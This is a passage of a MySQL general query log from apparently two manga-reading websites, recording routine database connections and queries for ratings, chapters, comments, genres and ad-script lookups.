330656251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330656251 Quit 330656252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330656252 Quit 330656253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330656253 Quit 330656254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330656254 Quit 330656255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330656255 Quit 330656256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330656256 Quit 330656257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330656257 Quit 330656258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330656258 Quit 330656259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330656259 Quit 330656260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330656260 Quit 330656261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330656261 Quit 330656262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330656262 Quit 330656263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330656263 Quit 330656264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330656264 Quit 330656265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330656265 Quit 330656266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330656266 Quit 330656267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330656267 Quit 330656268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330656268 Quit 330656269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330656269 Quit 330656270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330656270 Quit 330656271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330656271 Quit 330656272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330656272 Quit 330656273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330656273 Quit 330656274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330656274 Quit 330656275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330656275 Quit 330656276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330656276 Quit 330656277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330656277 Quit 330656278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330656278 Quit 330656279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330656279 Quit 330656280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330656280 Quit 330656281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330656281 Quit 330656282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656282 Quit 330656283 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656283 Quit 260225 19:29:45 330656284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656284 Quit 330656285 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12511' 330656285 Quit 330656286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656286 Query select * FROM chapters where id = '12511' 330656286 Quit 330656287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656287 Query select * FROM chapters where manga_id = '239' order by id desc 330656287 Quit 330656288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656288 Query Update chapters set view=view+1 where id = '12511' 330656288 Quit 330656289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656289 Query select * FROM chapters where id = '12511' 330656289 Quit 330656290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656290 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12511' 330656290 Quit 330656291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656291 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12511', '1.47.26.109', 'mangacherri.com', '2026-02-26 03:29:45', '2026-02-26 03:29:45') 330656291 Quit 330656292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656292 Query select * FROM chapter_images where chapter_id = '12511' 330656292 Quit 330656293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656293 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330656293 Quit 330656294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656294 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330656216 Quit 330656295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656295 Quit 330656296 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656296 Quit 330656297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656297 Quit 330656298 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656298 Quit 330656299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656299 Quit 330656300 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656300 Quit 330656301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656301 Quit 330656302 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656302 Quit 330656294 Quit 330656303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656304 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656303 Quit 330656304 Quit 330656305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656305 Quit 330656306 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656306 Quit 330656307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656307 Quit 330656308 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656308 Quit 330656309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656309 Quit 330656310 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330656310 Quit 330656311 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656312 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656311 Quit 330656312 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'tokyo-ghoul' 330656312 Quit 330656313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656313 Query select * FROM chapters where manga_id = '149' order by display_priority ASC, id desc 330656313 Quit 330656314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656314 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '149' and m.active = 1 330656314 Quit 330656315 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656315 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='149' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Drama%' OR genres like '%Horror%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%Sci-Fi%') ORDER BY RAND() limit 10 330656315 Quit 330656316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656316 Query select * FROM comments where manga_id = '149' and parent_id is null order by created desc 330656316 Quit 330656317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656317 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '149' and m.active = 1 330656317 Quit 330656318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656318 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Action%' OR m.genres like '%Adventure%' OR m.genres like '%Drama%' OR m.genres like '%Horror%' OR m.genres like '%Psychological%' OR m.genres like '%Romance%' OR m.genres like '%Sci-Fi%') where m.active = 1 group by manga_id ORDER BY sum(view) DESC 330656318 Quit 330656319 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656319 Quit 330656320 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330656320 Quit 330656321 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330656321 Quit 330656322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656322 Query select * FROM chapters where manga_id = '149' order by created desc limit 1 330656322 Quit 330656323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656323 Query select * FROM comments where parent_id = '4472' 330656323 Quit 330656324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656324 Query select * FROM comments where parent_id = '4470' 330656324 Quit 330656325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656325 Query select * FROM comments where parent_id = '3856' 330656325 Quit 330656326 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656326 Query select * FROM comments where parent_id = '3787' 330656326 Quit 330656327 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656327 Query select * FROM comments where parent_id = '3752' 330656327 Quit 330656328 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656328 Query select * FROM comments where parent_id = '3588' 330656328 Quit 330656329 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656329 Query select * FROM comments where parent_id = '3199' 330656329 Quit 330656330 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656330 Query select * FROM comments where parent_id = '3161' 330656330 Quit 330656331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656331 Query select * FROM comments where parent_id = '2919' 330656331 Quit 330656332 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656332 Query select * FROM comments where parent_id = '2515' 330656332 Quit 330656333 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656333 Query select * FROM comments where parent_id = '2479' 330656333 Quit 330656334 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656334 Query select * FROM comments where parent_id = '2480' 330656334 Quit 330656335 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656335 Query select * FROM comments where parent_id = '2478' 330656335 Quit 330656336 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656336 Query select * FROM comments where parent_id = '2445' 330656336 Quit 330656337 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656337 Query select * FROM comments where parent_id = '2422' 330656337 Quit 330656338 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656338 Query select * FROM comments where parent_id = '2017' 330656338 Quit 330656339 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656339 Query select * FROM comments where parent_id = '2008' 330656339 Quit 330656340 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656340 Query select * FROM comments where parent_id = '1617' 330656340 Quit 330656341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656341 Query select * FROM comments where parent_id = '1520' 330656341 Quit 330656342 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330656342 Quit 330656343 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330656343 Quit 330656344 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330656344 Quit 330656345 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330656345 Quit 330656346 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330656346 Quit 330656347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330656347 Quit 330656348 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330656348 Quit 330656349 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330656349 Quit 330656350 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330656350 Quit 330656351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330656351 Quit 330656352 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330656352 Quit 330656353 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330656353 Quit 330656354 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330656354 Quit 330656355 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330656355 Quit 330656356 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330656356 Quit 330656357 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330656357 Quit 330656358 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330656358 Quit 330656359 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330656359 Quit 330656360 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330656360 Quit 330656361 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330656361 Quit 330656362 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330656362 Quit 330656363 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330656363 Quit 330656364 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330656364 Quit 330656365 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330656365 Quit 330656366 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330656366 Quit 330656367 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330656367 Quit 330656368 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330656368 Quit 330656369 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330656369 Quit 330656370 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330656370 Quit 330656371 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330656371 Quit 330656372 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330656372 Quit 330656373 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330656373 Quit 330656374 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330656374 Quit 330656375 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330656375 Quit 330656376 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330656376 Quit 330656377 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330656377 Quit 330656378 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330656378 Quit 330656379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330656379 Quit 330656380 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330656380 Quit 330656381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330656381 Quit 330656382 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330656382 Quit 330656383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330656383 Quit 330656384 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330656384 Quit 330656385 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330656385 Quit 330656386 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330656386 Quit 330656387 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330656387 Quit 330656388 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330656388 Quit 330656389 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330656389 Quit 330656390 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330656390 Quit 330656391 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330656391 Quit 330656392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330656392 Quit 330656393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330656393 Quit 330656394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330656394 Quit 330656395 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330656395 Quit 330656396 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330656396 Quit 330656397 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330656397 Quit 330656398 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330656398 Quit 330656399 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330656399 Quit 330656400 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330656400 Quit 330656401 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330656401 Quit 330656402 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330656402 Quit 330656403 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330656403 Quit 330656404 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330656404 Quit 330656405 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330656405 Quit 330656406 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330656406 Quit 330656407 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330656407 Quit 330656408 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330656408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330656408 Quit 330656409 Connect 